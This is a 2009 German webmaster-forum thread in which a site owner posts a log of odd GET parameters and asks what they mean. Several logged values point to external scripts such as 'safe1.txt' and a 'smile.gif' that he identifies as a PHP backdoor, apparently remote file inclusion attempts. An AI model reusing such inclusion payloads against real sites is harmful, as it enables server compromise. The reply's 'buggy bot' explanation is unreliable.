Überwachung, Sicherheit und Backups - Forum

Derzeit sind Sie als Gast in unserem Forum aktiv. Für das Schreiben registrieren Sie sich bitte. Unser Forum ist eine Austauschplattform für Webworker zum Kommunizieren, Helfen, Informieren und Hilfe finden. Auf der rechten Seiten finden Sie eine Forenübersicht über alle Bereiche des Webmaster-Forums. Unterhalb finden Sie alle aktuellen Themen.


cl4ym4n
Beiträge: 17

PN schreiben
Profil ansehen
User ist offline

Seltsame Anfragen via GET-Parametern

Link zur Antwort auf "Seltsame Anfragen via GET-Parametern" von cl4ym4n cl4ym4n, am Freitag den 10.04.2009 um 05:02:30

Sers,

ich logge bei meiner privaten Homepage, welche Rubrik wieviele Hits hat (bin Stats-Lover^^), jedenfalls sind mir einige sehr seltsame Einträge aufgefallen:

 
HTML
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
c=http://scottstubbs.com/safe1.txt???   8
c=http://www.victor-international.com//images/text/safe1.txt???   4
c=http://www.victor-international.com/images/text/safe1.txt???   3
http://www.victor-international.com//images/text/safe1.txt???   3
c=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt?   2
c=http://www.hakcan.com//modules/coppermine/themes/default/fx29id1.txt??   2
c=http://hrpages.net/kids_and_teens/school_time/safe1.txt???   2
c=http://www.robmccoll.com/images/safe1.txt???   2
c=http://www.mediamatic.cl/presentacion/wut.txt???   1
http://jacky-rouquette.com//lynhilde/img/mont_s/safe1.txt???   1
http://team95.org/team95_get//smile.gif?   1

Über c= wurde (bei meiner alten Website) die entsprechende Rubrik übergeben, kann also ignoriert werden. Die Zahlen hinter den URLs ist die Anzahl der bisherigen Aufrufe.

Ich hab sämtliche URLs aufgerufen.. überwiegend kommt (mittlerweile?) ne 404 Fehlerseite. Von allen Einträgen war der letzte (.../smile.gif) als PHP.Backdoor, sowie der 5te als Info-Script zu identifizieren... hab den Code mal kopiert -> http://nopaste.info/61f6f3f469.html

Offensichtlich gibt das Script lediglich Infos zum Webspace/Server aus... mir stellen sich dabei aber einige Fragen:

- Wofür sollen die ausgegebenen Infos gut sein?
- Wie kommt es, dass solche Anfragen bei mir laufen?
- Welche konkrete Gefahr geht von sowas aus?

Die Anfrage bzw. das Script wird bei mir nicht ausgeführt, weil ich die GET-Variablen vor dem Ausführen/Eintragen in die DB bearbeite, allerdings ist es schon irgendwie seltsam, diese Attacken zu sehen, weil ich mich Frage, woher sowas kommt und letztlich ist dann irgendwie auch noch die Frage, ob man irgendwo doch noch ne Lücke in seiner Seite hat...

Hat irgendwer von euch weitere Infos/Tipps diesbezüglich für mich?

Thx

Link zur Antwort auf "Seltsame Anfragen via GET-Parametern" von Sebastian Bechtel Sebastian Bechtel, am Freitag den 10.04.2009 um 09:42:45

Hi,

Ich würd spontan mal drauf tippen, dass es einfach ein Fehler in nem bot ist, der da was durcheinander mischt und somit falsche Parameter an deine Seite hängt.

Interessant wäre noch zu wissen, wo der Aufrufer her kommt, also ob er nen Referer hat.

Für deine Anwendung sehe ich da keine Gefahr, denn du filterst ja deine Parameter.